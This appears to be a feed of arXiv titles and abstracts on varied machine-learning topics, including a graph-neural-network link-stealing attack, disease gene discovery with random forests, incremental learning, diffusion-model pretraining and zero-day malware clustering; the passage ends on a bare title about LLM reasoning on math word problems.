    Graph neural networks (GNNs) have brought superb performance to various applications utilizing graph structural data, such as social analysis and fraud detection. The graph links, e.g., social relationships and transaction history, are sensitive and valuable information, which raises privacy concerns when using GNNs. To exploit these vulnerabilities, we propose VertexSerum, a novel graph poisoning attack that increases the effectiveness of graph link stealing by amplifying the link connectivity leakage. To infer node adjacency more accurately, we propose an attention mechanism that can be embedded into the link detection network. Our experiments demonstrate that VertexSerum significantly outperforms the SOTA link inference attack, improving the AUC scores by an average of $9.8\%$ across four real-world datasets and three different GNN structures. Furthermore, our experiments reveal the effectiveness of VertexSerum in both black-box and online learning settings, further validating its applicability in real-world scenarios.
    Evaluation of network-guided random forest for disease gene discovery. (arXiv:2308.01323v1 [q-bio.MN])
    Gene network information is believed to be beneficial for disease module and pathway identification, but has not been explicitly utilized in the standard random forest (RF) algorithm for gene expression data analysis. We investigate the performance of a network-guided RF where the network information is summarized into a sampling probability of predictor variables which is further used in the construction of the RF. Our results suggest that network-guided RF does not provide better disease prediction than the standard RF. In terms of disease gene discovery, if disease genes form module(s), network-guided RF identifies them more accurately. In addition, when disease status is independent from genes in the given network, spurious gene selection results can occur when using network information, especially on hub genes. Our empirical analysis on two balanced microarray and RNA-Seq breast cancer datasets from The Cancer Genome Atlas (TCGA) for classification of progesterone receptor (PR) status also demonstrates that network-guided RF can identify genes from PGR-related pathways, which leads to a better connected module of identified genes.
    Neural Collapse Terminus: A Unified Solution for Class Incremental Learning and Its Variants. (arXiv:2308.01746v1 [cs.LG])
    How to enable learnability for new classes while keeping the capability well on old classes has been a crucial challenge for class incremental learning. Beyond the normal case, long-tail class incremental learning and few-shot class incremental learning are also proposed to consider the data imbalance and data scarcity, respectively, which are common in real-world implementations and further exacerbate the well-known problem of catastrophic forgetting. Existing methods are specifically proposed for one of the three tasks. In this paper, we offer a unified solution to the misalignment dilemma in the three tasks. Concretely, we propose neural collapse terminus that is a fixed structure with the maximal equiangular inter-class separation for the whole label space. It serves as a consistent target throughout the incremental training to avoid dividing the feature space incrementally. For CIL and LTCIL, we further propose a prototype evolving scheme to drive the backbone features into our neural collapse terminus smoothly. Our method also works for FSCIL with only minor adaptations. Theoretical analysis indicates that our method holds the neural collapse optimality in an incremental fashion regardless of data imbalance or data scarcity. We also design a generalized case where we do not know the total number of classes and whether the data distribution is normal, long-tail, or few-shot for each coming session, to test the generalizability of our method. Extensive experiments with multiple datasets are conducted to demonstrate the effectiveness of our unified solution to all the three tasks and the generalized case.
    Multitask Learning with No Regret: from Improved Confidence Bounds to Active Learning. (arXiv:2308.01744v1 [cs.LG])
    Multitask learning is a powerful framework that enables one to simultaneously learn multiple related tasks by sharing information between them. Quantifying uncertainty in the estimated tasks is of pivotal importance for many downstream applications, such as online or active learning. In this work, we provide novel multitask confidence intervals in the challenging agnostic setting, i.e., when neither the similarity between tasks nor the tasks' features are available to the learner. The obtained intervals do not require i.i.d. data and can be directly applied to bound the regret in online learning. Through a refined analysis of the multitask information gain, we obtain new regret guarantees that, depending on a task similarity parameter, can significantly improve over treating tasks independently. We further propose a novel online learning algorithm that achieves such improved regret without knowing this parameter in advance, i.e., automatically adapting to task similarity. As a second key application of our results, we introduce a novel multitask active learning setup where several tasks must be simultaneously optimized, but only one of them can be queried for feedback by the learner at each round. For this problem, we design a no-regret algorithm that uses our confidence intervals to decide which task should be queried. Finally, we empirically validate our bounds and algorithms on synthetic and real-world (drug discovery) data.
    MAP: A Model-agnostic Pretraining Framework for Click-through Rate Prediction. (arXiv:2308.01737v1 [cs.IR])
    With the widespread application of personalized online services, click-through rate (CTR) prediction has received more and more attention and research. The most prominent features of CTR prediction are its multi-field categorical data format, and vast and daily-growing data volume. The large capacity of neural models helps digest such massive amounts of data under the supervised learning paradigm, yet they fail to utilize the substantial data to its full potential, since the 1-bit click signal is not sufficient to guide the model to learn capable representations of features and instances. The self-supervised learning paradigm provides a more promising pretrain-finetune solution to better exploit the large amount of user click logs, and learn more generalized and effective representations. However, self-supervised learning for CTR prediction is still an open question, since current works on this line are only preliminary and rudimentary. To this end, we propose a Model-agnostic pretraining (MAP) framework that applies feature corruption and recovery on multi-field categorical data, and more specifically, we derive two practical algorithms: masked feature prediction (MFP) and replaced feature detection (RFD). MFP digs into feature interactions within each instance through masking and predicting a small portion of input features, and introduces noise contrastive estimation (NCE) to handle large feature spaces. RFD further turns MFP into a binary classification mode through replacing and detecting changes in input features, making it even simpler and more effective for CTR pretraining. Our extensive experiments on two real-world large-scale datasets (i.e., Avazu, Criteo) demonstrate the advantages of these two methods on several strong backbones (e.g., DCNv2, DeepFM), and achieve new state-of-the-art performance in terms of both effectiveness and efficiency for CTR prediction.
    Masked Diffusion Models Are Fast and Privacy-Aware Learners. (arXiv:2306.11363v2 [cs.CV] UPDATED)
    Diffusion models have emerged as the \emph{de-facto} technique for image generation, yet they entail significant computational overhead, hindering the technique's broader application in the research community. We propose a prior-based denoising training framework, the first to incorporate the pre-train and fine-tune paradigm into the diffusion model training process, which substantially improves training efficiency and shows potential in facilitating various downstream tasks. Our approach centers on masking a high proportion (e.g., up to 90\%) of the input image and employing masked denoising score matching to denoise the visible areas, thereby guiding the diffusion model to learn more salient features from training data as prior knowledge. By utilizing masked learning in a pre-training stage, we efficiently train the ViT-based diffusion model on CelebA-HQ $256 \times 256$ in the pixel space, achieving a 4x acceleration and enhancing the quality of generated images compared to denoising diffusion probabilistic model (DDPM). Moreover, our masked pre-training technique can be universally applied to various diffusion models that directly generate images in the pixel space, aiding in the learning of pre-trained models with superior generalizability. For instance, a diffusion model pre-trained on VGGFace2 attains a 46\% quality improvement through fine-tuning with merely 10\% data from a different distribution. Moreover, our method shows the potential to serve as a training paradigm for enhancing the privacy protection capabilities of diffusion models. Our code is available at \url{https://github.com/jiachenlei/maskdm}.
    Graph Neural Networks for Forecasting Multivariate Realized Volatility with Spillover Effects. (arXiv:2308.01419v1 [q-fin.ST])
    We present a novel methodology for modeling and forecasting multivariate realized volatilities using customized graph neural networks to incorporate spillover effects across stocks. The proposed model offers the benefits of incorporating spillover effects from multi-hop neighbors, capturing nonlinear relationships, and flexible training with different loss functions. Our empirical findings provide compelling evidence that incorporating spillover effects from multi-hop neighbors alone does not yield a clear advantage in terms of predictive accuracy. However, modeling nonlinear spillover effects enhances the forecasting accuracy of realized volatilities, particularly for short-term horizons of up to one week. Moreover, our results consistently indicate that training with the Quasi-likelihood loss leads to substantial improvements in model performance compared to the commonly-used mean squared error. A comprehensive series of empirical evaluations in alternative settings confirm the robustness of our results.
    A Neural Network Warm-Start Approach for the Inverse Acoustic Obstacle Scattering Problem. (arXiv:2212.08736v3 [math.NA] UPDATED)
    We consider the inverse acoustic obstacle problem for sound-soft star-shaped obstacles in two dimensions wherein the boundary of the obstacle is determined from measurements of the scattered field at a collection of receivers outside the object. One of the standard approaches for solving this problem is to reformulate it as an optimization problem: finding the boundary of the domain that minimizes the $L^2$ distance between computed values of the scattered field and the given measurement data. The optimization problem is computationally challenging since the local set of convexity shrinks with increasing frequency and results in an increasing number of local minima in the vicinity of the true solution. In many practical experimental settings, low frequency measurements are unavailable due to limitations of the experimental setup or the sensors used for measurement. Thus, obtaining a good initial guess for the optimization problem plays a vital role in this environment. We present a neural network warm-start approach for solving the inverse scattering problem, where an initial guess for the optimization problem is obtained using a trained neural network. We demonstrate the effectiveness of our method with several numerical examples. For high frequency problems, this approach outperforms traditional iterative methods such as Gauss-Newton initialized without any prior (i.e., initialized using a unit circle), or initialized using the solution of a direct method such as the linear sampling method. The algorithm remains robust to noise in the scattered field measurements and also converges to the true solution for limited aperture data. However, the number of training samples required to train the neural network scales exponentially in frequency and the complexity of the obstacles considered. We conclude with a discussion of this phenomenon and potential directions for future research.
    Telematics Combined Actuarial Neural Networks for Cross-Sectional and Longitudinal Claim Count Data. (arXiv:2308.01729v1 [stat.ML])
    We present novel cross-sectional and longitudinal claim count models for vehicle insurance built upon the Combined Actuarial Neural Network (CANN) framework proposed by Mario W\"uthrich and Michael Merz. The CANN approach combines a classical actuarial model, such as a generalized linear model, with a neural network. This blending of models results in a two-component model comprising a classical regression model and a neural network part. The CANN model leverages the strengths of both components, providing a solid foundation and interpretability from the classical model while harnessing the flexibility and capacity to capture intricate relationships and interactions offered by the neural network. In our proposed models, we use well-known log-linear claim count regression models for the classical regression part and a multilayer perceptron (MLP) for the neural network part. The MLP part is used to process telematics car driving data given as a vector characterizing the driving behavior of each insured driver. In addition to the Poisson and negative binomial distributions for cross-sectional data, we propose a procedure for training our CANN model with a multivariate negative binomial (MVNB) specification. By doing so, we introduce a longitudinal model that accounts for the dependence between contracts from the same insured. Our results reveal that the CANN models exhibit superior performance compared to log-linear models that rely on manually engineered telematics features.
    Classification and Online Clustering of Zero-Day Malware. (arXiv:2305.00605v2 [cs.CR] UPDATED)
    A large amount of new malware is constantly being generated, which must not only be distinguished from benign samples, but also classified into malware families. For this purpose, investigating how existing malware families are developed and examining emerging families need to be explored. This paper focuses on the online processing of incoming malicious samples to assign them to existing families or, in the case of samples from new families, to cluster them. We experimented with seven prevalent malware families from the EMBER dataset, four in the training set and three additional new families in the test set. Based on the classification score of the multilayer perceptron, we determined which samples would be classified and which would be clustered into new malware families. We classified 97.21% of streaming data with a balanced accuracy of 95.33%. Then, we clustered the remaining data using a self-organizing map, achieving a purity from 47.61% for four clusters to 77.68% for ten clusters. These results indicate that our approach has the potential to be applied to the classification and clustering of zero-day malware into malware families.
    Finding the Optimum Design of Large Gas Engines Prechambers Using CFD and Bayesian Optimization. (arXiv:2308.01743v1 [cs.CE])
    The turbulent jet ignition concept using prechambers is a promising solution to achieve stable combustion at lean conditions in large gas engines, leading to high efficiency at low emission levels. Due to the wide range of design and operating parameters for large gas engine prechambers, the preferred method for evaluating different designs is computational fluid dynamics (CFD), as testing in test bed measurement campaigns is time-consuming and expensive. However, the significant computational time required for detailed CFD simulations due to the complexity of solving the underlying physics also limits its applicability. In optimization settings similar to the present case, i.e., where the evaluation of the objective function(s) is computationally costly, Bayesian optimization has largely replaced classical design-of-experiment. Thus, the present study deals with the computationally efficient Bayesian optimization of large gas engine prechambers design using CFD simulation. Reynolds-averaged-Navier-Stokes simulations are used to determine the target values as a function of the selected prechamber design parameters. The results indicate that the chosen strategy is effective to find a prechamber design that achieves the desired target values.
    Implicit Occupancy Flow Fields for Perception and Prediction in Self-Driving. (arXiv:2308.01471v1 [cs.CV])
    A self-driving vehicle (SDV) must be able to perceive its surroundings and predict the future behavior of other traffic participants. Existing works either perform object detection followed by trajectory forecasting of the detected objects, or predict dense occupancy and flow grids for the whole scene. The former poses a safety concern as the number of detections needs to be kept low for efficiency reasons, sacrificing object recall. The latter is computationally expensive due to the high-dimensionality of the output grid, and suffers from the limited receptive field inherent to fully convolutional networks. Furthermore, both approaches employ many computational resources predicting areas or objects that might never be queried by the motion planner. This motivates our unified approach to perception and future prediction that implicitly represents occupancy and flow over time with a single neural network. Our method avoids unnecessary computation, as it can be directly queried by the motion planner at continuous spatio-temporal locations. Moreover, we design an architecture that overcomes the limited receptive field of previous explicit occupancy prediction methods by adding an efficient yet effective global attention mechanism. Through extensive experiments in both urban and highway settings, we demonstrate that our implicit model outperforms the current state-of-the-art. For more information, visit the project website: https://waabi.ai/research/implicito.
    Confident Neural Network Regression with Bootstrapped Deep Ensembles. (arXiv:2202.10903v2 [stat.ML] UPDATED)
    With the rise of the popularity and usage of neural networks, trustworthy uncertainty estimation is becoming increasingly essential. One of the most prominent uncertainty estimation methods is Deep Ensembles (Lakshminarayanan et al., 2017) . A classical parametric model has uncertainty in the parameters due to the fact that the data on which the model is build is a random sample. A modern neural network has an additional uncertainty component since the optimization of the network is random. Lakshminarayanan et al. (2017) noted that Deep Ensembles do not incorporate the classical uncertainty induced by the effect of finite data. In this paper, we present a computationally cheap extension of Deep Ensembles for the regression setting, called Bootstrapped Deep Ensembles, that explicitly takes this classical effect of finite data into account using a modified version of the parametric bootstrap. We demonstrate through an experimental study that our method significantly improves upon standard Deep Ensembles
    Explainable Deep Learning for Tumor Dynamic Modeling and Overall Survival Prediction using Neural-ODE. (arXiv:2308.01362v1 [q-bio.QM])
    While tumor dynamic modeling has been widely applied to support the development of oncology drugs, there remains a need to increase predictivity, enable personalized therapy, and improve decision-making. We propose the use of Tumor Dynamic Neural-ODE (TDNODE) as a pharmacology-informed neural network to enable model discovery from longitudinal tumor size data. We show that TDNODE overcomes a key limitation of existing models in its ability to make unbiased predictions from truncated data. The encoder-decoder architecture is designed to express an underlying dynamical law which possesses the fundamental property of generalized homogeneity with respect to time. Thus, the modeling formalism enables the encoder output to be interpreted as kinetic rate metrics, with inverse time as the physical unit. We show that the generated metrics can be used to predict patients' overall survival (OS) with high accuracy. The proposed modeling formalism provides a principled way to integrate multimodal dynamical datasets in oncology disease modeling.
    Auxiliary Cross-Modal Representation Learning with Triplet Loss Functions for Online Handwriting Recognition. (arXiv:2202.07901v3 [cs.LG] UPDATED)
    Cross-modal representation learning learns a shared embedding between two or more modalities to improve performance in a given task compared to using only one of the modalities. Cross-modal representation learning from different data types -- such as images and time-series data (e.g., audio or text data) -- requires a deep metric learning loss that minimizes the distance between the modality embeddings. In this paper, we propose to use the contrastive or triplet loss, which uses positive and negative identities to create sample pairs with different labels, for cross-modal representation learning between image and time-series modalities (CMR-IS). By adapting the triplet loss for cross-modal representation learning, higher accuracy in the main (time-series classification) task can be achieved by exploiting additional information of the auxiliary (image classification) task. We present a triplet loss with a dynamic margin for single label and sequence-to-sequence classification tasks. We perform extensive evaluations on synthetic image and time-series data, and on data for offline handwriting recognition (HWR) and on online HWR from sensor-enhanced pens for classifying written words. Our experiments show an improved classification accuracy, faster convergence, and better generalizability due to an improved cross-modal representation. Furthermore, the more suitable generalizability leads to a better adaptability between writers for online HWR.
    Variational Classification. (arXiv:2305.10406v2 [cs.LG] UPDATED)
    We present a latent variable generalisation of neural network softmax classification trained with cross-entropy loss, referred to as variational classification (VC). Our approach offers a novel probabilistic perspective on the highly familiar softmax classification model, to which it relates similarly to how variational and traditional autoencoders relate. We derive a training objective based on the evidence lower bound (ELBO) that is non-trivial to optimize, and therefore propose an adversarial approach to maximise it. We show that VC addresses an inherent inconsistency within softmax classification, whilst also allowing more flexible choices of prior distributions in the latent space in place of implicit assumptions revealed within off-the-shelf softmax classifiers. Empirical evaluation on image and text classification datasets demonstrates that variational classification maintains prediction accuracy while improving other desirable properties such as calibration and adversarial robustness, particularly under distribution shift and low data settings.
    MARLIM: Multi-Agent Reinforcement Learning for Inventory Management. (arXiv:2308.01649v1 [cs.LG])
    Maintaining a balance between the supply and demand of products by optimizing replenishment decisions is one of the most important challenges in the supply chain industry. This paper presents a novel reinforcement learning framework called MARLIM, to address the inventory management problem for a single-echelon multi-products supply chain with stochastic demands and lead-times. Within this context, controllers are developed through single or multiple agents in a cooperative setting. Numerical experiments on real data demonstrate the benefits of reinforcement learning methods over traditional baselines.
    Benchmarking Adaptative Variational Quantum Algorithms on QUBO Instances. (arXiv:2308.01789v1 [quant-ph])
    In recent years, Variational Quantum Algorithms (VQAs) have emerged as a promising approach for solving optimization problems on quantum computers in the NISQ era. However, one limitation of VQAs is their reliance on fixed-structure circuits, which may not be taylored for specific problems or hardware configurations. A leading strategy to address this issue are Adaptative VQAs, which dynamically modify the circuit structure by adding and removing gates, and optimize their parameters during the training. Several Adaptative VQAs, based on heuristics such as circuit shallowness, entanglement capability and hardware compatibility, have already been proposed in the literature, but there is still lack of a systematic comparison between the different methods. In this paper, we aim to fill this gap by analyzing three Adaptative VQAs: Evolutionary Variational Quantum Eigensolver (EVQE), Variable Ansatz (VAns), already proposed in the literature, and Random Adapt-VQE (RA-VQE), a random approach we introduce as a baseline. In order to compare these algorithms to traditional VQAs, we also include the Quantum Approximate Optimization Algorithm (QAOA) in our analysis. We apply these algorithms to QUBO problems and study their performance by examining the quality of the solutions found and the computational times required. Additionally, we investigate how the choice of the hyperparameters can impact the overall performance of the algorithms, highlighting the importance of selecting an appropriate methodology for hyperparameter tuning. Our analysis sets benchmarks for Adaptative VQAs designed for near-term quantum devices and provides valuable insights to guide future research in this area.
    Model Calibration in Dense Classification with Adaptive Label Perturbation. (arXiv:2307.13539v2 [cs.CV] UPDATED)
    For safety-related applications, it is crucial to produce trustworthy deep neural networks whose prediction is associated with confidence that can represent the likelihood of correctness for subsequent decision-making. Existing dense binary classification models are prone to being over-confident. To improve model calibration, we propose Adaptive Stochastic Label Perturbation (ASLP) which learns a unique label perturbation level for each training image. ASLP employs our proposed Self-Calibrating Binary Cross Entropy (SC-BCE) loss, which unifies label perturbation processes including stochastic approaches (like DisturbLabel), and label smoothing, to correct calibration while maintaining classification rates. ASLP follows Maximum Entropy Inference of classic statistical mechanics to maximise prediction entropy with respect to missing information. It performs this while: (1) preserving classification accuracy on known data as a conservative solution, or (2) specifically improves model calibration degree by minimising the gap between the prediction accuracy and expected confidence of the target training label. Extensive results demonstrate that ASLP can significantly improve calibration degrees of dense binary classification models on both in-distribution and out-of-distribution data. The code is available on https://github.com/Carlisle-Liu/ASLP.
    Unsupervised Compositional Concepts Discovery with Text-to-Image Generative Models. (arXiv:2306.05357v2 [cs.CV] UPDATED)
    Text-to-image generative models have enabled high-resolution image synthesis across different domains, but require users to specify the content they wish to generate. In this paper, we consider the inverse problem -- given a collection of different images, can we discover the generative concepts that represent each image? We present an unsupervised approach to discover generative concepts from a collection of images, disentangling different art styles in paintings, objects, and lighting from kitchen scenes, and discovering image classes given ImageNet images. We show how such generative concepts can accurately represent the content of images, be recombined and composed to generate new artistic and hybrid images, and be further used as a representation for downstream classification tasks.
    On the Trustworthiness Landscape of State-of-the-art Generative Models: A Comprehensive Survey. (arXiv:2307.16680v2 [cs.LG] UPDATED)
    Diffusion models and large language models have emerged as leading-edge generative models and have sparked a revolutionary impact on various aspects of human life. However, the practical implementation of these models has also exposed inherent risks, highlighting their dual nature and raising concerns regarding their trustworthiness. Despite the abundance of literature on this subject, a comprehensive survey specifically delving into the intersection of large-scale generative models and their trustworthiness remains largely absent. To bridge this gap, This paper investigates both the long-standing and emerging threats associated with these models across four fundamental dimensions: privacy, security, fairness, and responsibility. In this way, we construct an extensive map outlining the trustworthiness of these models, while also providing practical recommendations and identifying future directions. These efforts are crucial for promoting the trustworthy deployment of these models, ultimately benefiting society as a whole.
    Distributed Online Private Learning of Convex Nondecomposable Objectives. (arXiv:2206.07944v4 [math.OC] UPDATED)
    We deal with a general distributed constrained online learning problem with privacy over time-varying networks, where a class of nondecomposable objectives are considered. Under this setting, each node only controls a part of the global decision, and the goal of all nodes is to collaboratively minimize the global cost over a time horizon $T$ while guarantees the security of the transmitted information. For such problems, we first design a novel generic algorithm framework, named as DPSDA, of differentially private distributed online learning using the Laplace mechanism and the stochastic variants of dual averaging method. Note that in the dual updates, all nodes of DPSDA employ the noise-corrupted gradients for more generality. Then, we propose two algorithms, named as DPSDA-C and DPSDA-PS, under this framework. In DPSDA-C, the nodes implement a circulation-based communication in the primal updates so as to alleviate the disagreements over time-varying undirected networks. In addition, for the extension to time-varying directed ones, the nodes implement the broadcast-based push-sum dynamics in DPSDA-PS, which can achieve average consensus over arbitrary directed networks. Theoretical results show that both algorithms attain an expected regret upper bound in $\mathcal{O}( \sqrt{T} )$ when the objective function is convex, which matches the best utility achievable by cutting-edge algorithms. Finally, numerical experiment results on both synthetic and real-world datasets verify the effectiveness of our algorithms.
    Reconstructing Turbulent Flows Using Physics-Aware Spatio-Temporal Dynamics and Test-Time Refinement. (arXiv:2304.12130v2 [physics.flu-dyn] UPDATED)
    Simulating turbulence is critical for many societally important applications in aerospace engineering, environmental science, the energy industry, and biomedicine. Large eddy simulation (LES) has been widely used as an alternative to direct numerical simulation (DNS) for simulating turbulent flows due to its reduced computational cost. However, LES is unable to capture all of the scales of turbulent transport accurately. Reconstructing DNS from low-resolution LES is critical for many scientific and engineering disciplines, but it poses many challenges to existing super-resolution methods due to the spatio-temporal complexity of turbulent flows. In this work, we propose a new physics-guided neural network for reconstructing the sequential DNS from low-resolution LES data. The proposed method leverages the partial differential equation that underlies the flow dynamics in the design of spatio-temporal model architecture. A degradation-based refinement method is also developed to enforce physical constraints and further reduce the accumulated reconstruction errors over long periods. The results on two different types of turbulent flow data confirm the superiority of the proposed method in reconstructing the high-resolution DNS data and preserving the physical characteristics of flow transport.
    Morphological Classification of Extragalactic Radio Sources Using Gradient Boosting Methods. (arXiv:2304.12729v2 [astro-ph.IM] UPDATED)
    The field of radio astronomy is witnessing a boom in the amount of data produced per day due to newly commissioned radio telescopes. One of the most crucial problems in this field is the automatic classification of extragalactic radio sources based on their morphologies. Most recent contributions in the field of morphological classification of extragalactic radio sources have proposed classifiers based on convolutional neural networks. Alternatively, this work proposes gradient boosting machine learning methods accompanied by principal component analysis as data-efficient alternatives to convolutional neural networks. Recent findings have shown the efficacy of gradient boosting methods in outperforming deep learning methods for classification problems with tabular data. The gradient boosting methods considered in this work are based on the XGBoost, LightGBM, and CatBoost implementations. This work also studies the effect of dataset size on classifier performance. A three-class classification problem is considered in this work based on the three main Fanaroff-Riley classes: class 0, class I, and class II, using radio sources from the Best-Heckman sample. All three proposed gradient boosting methods outperformed a state-of-the-art convolutional neural networks-based classifier using less than a quarter of the number of images, with CatBoost having the highest accuracy. This was mainly due to the superior accuracy of gradient boosting methods in classifying Fanaroff-Riley class II sources, with 3$\unicode{x2013}$4% higher recall.
    Recent advancement in Disease Diagnostic using machine learning: Systematic survey of decades, comparisons, and challenges. (arXiv:2308.01319v1 [cs.LG])
    Computer-aided diagnosis (CAD), a vibrant medical imaging research field, is expanding quickly. Because errors in medical diagnostic systems might lead to seriously misleading medical treatments, major efforts have been made in recent years to improve computer-aided diagnostics applications. The use of machine learning in computer-aided diagnosis is crucial. A simple equation may result in a false indication of items like organs. Therefore, learning from examples is a vital component of pattern recognition. Pattern recognition and machine learning in the biomedical area promise to increase the precision of disease detection and diagnosis. They also support the decision-making process's objectivity. Machine learning provides a practical method for creating elegant and autonomous algorithms to analyze high-dimensional and multimodal bio-medical data. This review article examines machine-learning algorithms for detecting diseases, including hepatitis, diabetes, liver disease, dengue fever, and heart disease. It draws attention to the collection of machine learning techniques and algorithms employed in studying conditions and the ensuing decision-making process.
    Causal Discovery from Temporal Data: An Overview and New Perspectives. (arXiv:2303.10112v3 [cs.LG] UPDATED)
    Temporal data, representing chronological observations of complex systems, has always been a typical data structure that can be widely generated by many domains, such as industry, medicine and finance. Analyzing this type of data is extremely valuable for various applications. Thus, different temporal data analysis tasks, eg, classification, clustering and prediction, have been proposed in the past decades. Among them, causal discovery, learning the causal relations from temporal data, is considered an interesting yet critical task and has attracted much research attention. Existing causal discovery works can be divided into two highly correlated categories according to whether the temporal data is calibrated, ie, multivariate time series causal discovery, and event sequence causal discovery. However, most previous surveys are only focused on the time series causal discovery and ignore the second category. In this paper, we specify the correlation between the two categories and provide a systematical overview of existing solutions. Furthermore, we provide public datasets, evaluation metrics and new perspectives for temporal data causal discovery.
    Price-Aware Deep Learning for Electricity Markets. (arXiv:2308.01436v1 [cs.LG])
    While deep learning gradually penetrates operational planning, its inherent prediction errors may significantly affect electricity prices. This letter examines how prediction errors propagate into electricity prices, revealing notable pricing errors and their spatial disparity in congested power systems. To improve fairness, we propose to embed electricity market-clearing optimization as a deep learning layer. Differentiating through this layer allows for balancing between prediction and pricing errors, as oppose to minimizing prediction errors alone. This layer implicitly optimizes fairness and controls the spatial distribution of price errors across the system. We showcase the price-aware deep learning in the nexus of wind power forecasting and short-term electricity market clearing.
    ROME: Robustifying Memory-Efficient NAS via Topology Disentanglement and Gradient Accumulation. (arXiv:2011.11233v2 [cs.LG] UPDATED)
    Albeit being a prevalent architecture searching approach, differentiable architecture search (DARTS) is largely hindered by its substantial memory cost since the entire supernet resides in the memory. This is where the single-path DARTS comes in, which only chooses a single-path submodel at each step. While being memory-friendly, it also comes with low computational costs. Nonetheless, we discover a critical issue of single-path DARTS that has not been primarily noticed. Namely, it also suffers from severe performance collapse since too many parameter-free operations like skip connections are derived, just like DARTS does. In this paper, we propose a new algorithm called RObustifying Memory-Efficient NAS (ROME) to give a cure. First, we disentangle the topology search from the operation search to make searching and evaluation consistent. We then adopt Gumbel-Top2 reparameterization and gradient accumulation to robustify the unwieldy bi-level optimization. We verify ROME extensively across 15 benchmarks to demonstrate its effectiveness and robustness.
    Stable and consistent density-based clustering via multiparameter persistence. (arXiv:2005.09048v3 [math.ST] UPDATED)
    We consider the degree-Rips construction from topological data analysis, which provides a density-sensitive, multiparameter hierarchical clustering algorithm. We analyze its stability to perturbations of the input data using the correspondence-interleaving distance, a metric for hierarchical clusterings that we introduce. Taking certain one-parameter slices of degree-Rips recovers well-known methods for density-based clustering, but we show that these methods are unstable. However, we prove that degree-Rips, as a multiparameter object, is stable, and we propose an alternative approach for taking slices of degree-Rips, which yields a one-parameter hierarchical clustering algorithm with better stability properties. We prove that this algorithm is consistent, using the correspondence-interleaving distance. We provide an algorithm for extracting a single clustering from one-parameter hierarchical clusterings, which is stable with respect to the correspondence-interleaving distance. And, we integrate these methods into a pipeline for density-based clustering, which we call Persistable. Adapting tools from multiparameter persistent homology, we propose visualization tools that guide the selection of all parameters of the pipeline. We demonstrate Persistable on benchmark datasets, showing that it identifies multi-scale cluster structure in data.
    Fairness in Recommendation: Foundations, Methods and Applications. (arXiv:2205.13619v6 [cs.IR] UPDATED)
    As one of the most pervasive applications of machine learning, recommender systems are playing an important role on assisting human decision making. The satisfaction of users and the interests of platforms are closely related to the quality of the generated recommendation results. However, as a highly data-driven system, recommender system could be affected by data or algorithmic bias and thus generate unfair results, which could weaken the reliance of the systems. As a result, it is crucial to address the potential unfairness problems in recommendation settings. Recently, there has been growing attention on fairness considerations in recommender systems with more and more literature on approaches to promote fairness in recommendation. However, the studies are rather fragmented and lack a systematic organization, thus making it difficult to penetrate for new researchers to the domain. This motivates us to provide a systematic survey of existing works on fairness in recommendation. This survey focuses on the foundations for fairness in recommendation literature. It first presents a brief introduction about fairness in basic machine learning tasks such as classification and ranking in order to provide a general overview of fairness research, as well as introduce the more complex situations and challenges that need to be considered when studying fairness in recommender systems. After that, the survey will introduce fairness in recommendation with a focus on the taxonomies of current fairness definitions, the typical techniques for improving fairness, as well as the datasets for fairness studies in recommendation. The survey also talks about the challenges and opportunities in fairness research with the hope of promoting the fair recommendation research area and beyond.
    Mlinear: Rethink the Linear Model for Time-series Forecasting. (arXiv:2305.04800v2 [cs.LG] UPDATED)
    Recently, significant advancements have been made in time-series forecasting research, with an increasing focus on analyzing the nature of time-series data, e.g, channel-independence (CI) and channel-dependence (CD), rather than solely focusing on designing sophisticated forecasting models. However, current research has primarily focused on either CI or CD in isolation, and the challenge of effectively combining these two opposing properties to achieve a synergistic effect remains an unresolved issue. In this paper, we carefully examine the opposing properties of CI and CD, and raise a practical question that has not been effectively answered, e.g.,"How to effectively mix the CI and CD properties of time series to achieve better predictive performance?" To answer this question, we propose Mlinear (MIX-Linear), a simple yet effective method based mainly on linear layers. The design philosophy of Mlinear mainly includes two aspects:(1) dynamically tuning the CI and CD properties based on the time semantics of different input time series, and (2) providing deep supervision to adjust the individual performance of the "CI predictor" and "CD predictor". In addition, empirically, we introduce a new loss function that significantly outperforms the widely used mean squared error (MSE) on multiple datasets. Experiments on time-series datasets covering multiple fields and widely used have demonstrated the superiority of our method over PatchTST which is the lateset Transformer-based method in terms of the MSE and MAE metrics on 7 datasets with identical sequence inputs (336 or 512). Specifically, our method significantly outperforms PatchTST with a ratio of 21:3 at 336 sequence length input and 29:10 at 512 sequence length input. Additionally, our approach has a 10 $\times$ efficiency advantage at the unit level, taking into account both training and inference times.
    Hierarchical Federated Learning in Wireless Networks: Pruning Tackles Bandwidth Scarcity and System Heterogeneity. (arXiv:2308.01562v1 [eess.SY])
    While a practical wireless network has many tiers where end users do not directly communicate with the central server, the users' devices have limited computation and battery powers, and the serving base station (BS) has a fixed bandwidth. Owing to these practical constraints and system models, this paper leverages model pruning and proposes a pruning-enabled hierarchical federated learning (PHFL) in heterogeneous networks (HetNets). We first derive an upper bound of the convergence rate that clearly demonstrates the impact of the model pruning and wireless communications between the clients and the associated BS. Then we jointly optimize the model pruning ratio, central processing unit (CPU) frequency and transmission power of the clients in order to minimize the controllable terms of the convergence bound under strict delay and energy constraints. However, since the original problem is not convex, we perform successive convex approximation (SCA) and jointly optimize the parameters for the relaxed convex problem. Through extensive simulation, we validate the effectiveness of our proposed PHFL algorithm in terms of test accuracy, wall clock time, energy consumption and bandwidth requirement.
    COVID-VR: A Deep Learning COVID-19 Classification Model Using Volume-Rendered Computer Tomography. (arXiv:2308.01433v1 [eess.IV])
    The COVID-19 pandemic presented numerous challenges to healthcare systems worldwide. Given that lung infections are prevalent among COVID-19 patients, chest Computer Tomography (CT) scans have frequently been utilized as an alternative method for identifying COVID-19 conditions and various other types of pulmonary diseases. Deep learning architectures have emerged to automate the identification of pulmonary disease types by leveraging CT scan slices as inputs for classification models. This paper introduces COVID-VR, a novel approach for classifying pulmonary diseases based on volume rendering images of the lungs captured from multiple angles, thereby providing a comprehensive view of the entire lung in each image. To assess the effectiveness of our proposal, we compared it against competing strategies utilizing both private data obtained from partner hospitals and a publicly available dataset. The results demonstrate that our approach effectively identifies pulmonary lesions and performs competitively when compared to slice-based methods.
    Reasoning in Large Language Models Through Symbolic Math Word Problems. (arXiv:2308.01906v1 [cs.CL])
